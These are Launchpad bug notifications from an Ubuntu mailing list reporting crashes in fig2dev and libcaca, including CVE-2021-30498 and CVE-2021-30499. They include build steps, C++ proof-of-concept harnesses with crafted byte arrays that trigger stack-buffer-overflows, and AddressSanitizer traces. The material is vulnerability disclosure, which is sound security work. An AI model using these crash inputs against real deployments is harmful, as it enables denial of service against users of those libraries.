[Touch-packages] [Bug 1926673] [NEW] Null pointer of fig2dev of gensvg.c in function svg_arrows
*** This bug is a security vulnerability *** Public security bug reported: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/114/ commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev ```bash $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" $ make ``` 3.run fig2dev ```bash $ ./fig2dev -L svg fig2dev_crash ``` asan info: http://www.w3.org/2000/svg; xmlns:xlink="http://www.w3.org/1999/xlink; width="73pt" height="113pt" viewBox="-76 -376 1202 1877"> AddressSanitizer:DEADLYSIGNAL = ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0) ==3255219==The signal is caused by a READ memory access. ==3255219==Hint: address points to the zero page. #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) AddressSanitizer can not provide additional info. 
SUMMARY: AddressSanitizer: SEGV /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 in svg_arrows ==3255219==ABORTING ** Affects: xfig (Ubuntu) Importance: Undecided Assignee: xiao huang (shanzhuli) Status: New ** Tags: security ** Information type changed from Private Security to Public Security ** Summary changed: - fig2dev + Null pointer of fig2dev of gensvg.c in function svg_arrows ** Description changed: Hi I found an crash error. issues: https://sourceforge.net/p/mcj/tickets/114/ - + commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/ System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 fig2dev Version 3.2.8a Verification steps: 1.Get the source code of fig2dev 2.Compile the fig2dev ```bash $ cd fig2dev-3.2.8a $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address" - $ make + $ make ``` 3.run fig2dev ```bash $ ./fig2dev -L svg fig2dev_crash ``` asan info: http://www.w3.org/2000/svg; - xmlns:xlink="http://www.w3.org/1999/xlink; - width="73pt" height="113pt" - viewBox="-76 -376 1202 1877"> + xmlns:xlink="http://www.w3.org/1999/xlink; + width="73pt" height="113pt" + viewBox="-76 -376 1202 1877"> + stroke="#00" stroke-width="8px"/> + stroke="#ff" stroke-width="8px"/> + stroke="#ff" stroke-width="8px"/> + x="0" y="0" width="134" height="134"> + stroke="#00" stroke-width="8px"/> + stroke="#00" stroke-width="8px"/> AddressSanitizer:DEADLYSIGNAL = ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0) ==3255219==The signal is caused by a READ memory access. ==3255219==Hint: address points to the zero page. 
- #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 - #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 - #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6 - #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11 - #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d) + #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 + #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17 + #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.
[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi
** Description changed: Hello ubuntu security team + + issues: https://github.com/cacalabs/libcaca/issues/55 + System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_ansi.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { - if(Size<8) return ; - size_t len=0; - caca_canvas_t *cv; - cv = caca_create_canvas(0,0); - caca_create_frame(cv,0); - caca_set_frame(cv,0); - caca_import_canvas_from_memory(cv,Data,Size,"ansi"); - caca_free_canvas(cv); - cv=NULL; + if(Size<8) return ; + size_t len=0; + caca_canvas_t *cv; + cv = caca_create_canvas(0,0); + caca_create_frame(cv,0); + caca_set_frame(cv,0); + caca_import_canvas_from_memory(cv,Data,Size,"ansi"); + caca_free_canvas(cv); + cv=NULL; } - int main(int args,char* argv[]){ - size_t len = 0; - unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; - len = sizeof(buffer)/sizeof(unsigned char); - printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); - crash((const uint8_t*)buffer,len); + size_t len = 0; + unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; + len = sizeof(buffer)/sizeof(unsigned char); + printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); + crash((const uint8_t*)buffer,len); - return 0; + return 0; } 4.compile poc_ansi.cc clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi 5.Run 
poc_ansi asan info: = ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8 READ of size 1 at 0x7ffda0164bea thread T0 - #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 - #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 - #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 - #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) + #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 + #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 + #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 + #3 0x7f098d2780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 + #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame - #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 + #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 - This frame has 1 object(s): - [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable + This frame has 1 object(s): + [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork - (longjmp and C++ exceptions *are* supported) + (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi Shadow bytes around the buggy address: - 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 - 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 - 
0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 - 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 + 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 + 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 + 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034024970:
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Description changed: Hello ubuntu security team + + issues:https://github.com/cacalabs/libcaca/issues/56 + System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 + libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { - if(Size<8) return ; - size_t len=0; - caca_canvas_t *cv; - cv = caca_create_canvas(0,0); - caca_create_frame(cv,0); - caca_set_frame(cv,0); - caca_import_canvas_from_memory(cv,Data,Size,"bin"); - caca_free_canvas(cv); - cv=NULL; + if(Size<8) return ; + size_t len=0; + caca_canvas_t *cv; + cv = caca_create_canvas(0,0); + caca_create_frame(cv,0); + caca_set_frame(cv,0); + caca_import_canvas_from_memory(cv,Data,Size,"bin"); + caca_free_canvas(cv); + cv=NULL; } int main(int args,char* argv[]){ - size_t len = 0; - unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; - len = sizeof(buffer)/sizeof(unsigned char); - printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); - crash((const uint8_t*)buffer,len); - return 0; + size_t len = 0; + unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; + len = sizeof(buffer)/sizeof(unsigned char); + printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); + crash((const uint8_t*)buffer,len); + return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ 
-Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: = ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 - #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 - #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 - #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 - #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 - #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) + #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 + #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 + #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 + #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 + #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame - #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 + #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 - This frame has 1 object(s): - [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable + This frame has 1 object(s): + [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork - (longjmp and C++ exceptions *are* supported) + (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: - 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eea0: 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[Touch-packages] [Bug 1925467] [NEW] stack-buffer-overflow of text.c in function _import_ansi
*** This bug is a security vulnerability *** Public security bug reported: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_ansi.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"ansi"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_ansi.cc clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi 5.Run poc_ansi asan info: = ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8 READ of size 1 at 0x7ffda0164bea thread T0 #0 0x7f098d82c30f in _import_ansi /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d) Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi Shadow bytes around the buggy address: 0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00 0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3 0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3763372==ABORTING Thanks ** Affects: libcaca (Ubuntu) Importance: Undecided Status: New ** 
Information type changed from Public to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925467 Title: stack-buffer-overflow of text.c in function _import_ansi Status in libcaca package in Ubuntu: New Bug description: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $
[Touch-packages] [Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin
*** This bug is a security vulnerability *** Public security bug reported: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd libcaca $ ./bootstrap $ ./configure $ make or $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make 3.Create the poc_bin.cc && build #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; void crash(const uint8_t *Data, size_t Size) { if(Size<8) return ; size_t len=0; caca_canvas_t *cv; cv = caca_create_canvas(0,0); caca_create_frame(cv,0); caca_set_frame(cv,0); caca_import_canvas_from_memory(cv,Data,Size,"bin"); caca_free_canvas(cv); cv=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; len = sizeof(buffer)/sizeof(unsigned char); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); crash((const uint8_t*)buffer,len); return 0; } 4.compile poc_bin.cc clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin 5.Run poc_bin asan info: = ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8 READ of size 1 at 0x7ffe7cd3774d thread T0 #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3 #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9 #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d) Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28 This frame has 1 object(s): [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin Shadow bytes around the buggy address: 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00 0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user:f7 Container overflow: fc Array cookie:ac Intra object redzone:bb ASan internal: fe Left alloca redzone: ca Right alloca redzone:cb Shadow gap: cc ==3817476==ABORTING Thanks ** Affects: libcaca (Ubuntu) Importance: Undecided Status: New ** 
Information type changed from Public to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1925468 Title: stack-buffer-overflow of import.c in function _import_bin Status in libcaca package in Ubuntu: New Bug description: Hello ubuntu security team System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library $ cd
[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
The issues have been assigned CVE numbers CVE-2021-30498 and CVE-2021-30499 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I used libfuzzer to test the libcaca API. I found two crashes: - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component: libcaca.so ## Affected source code file affected source code file (as call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory() in libcaca/caca/codec/export.c -> export_tga() in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc and poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = 
caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char);
[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Summary changed: - libcaca buffer-overflow + buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ 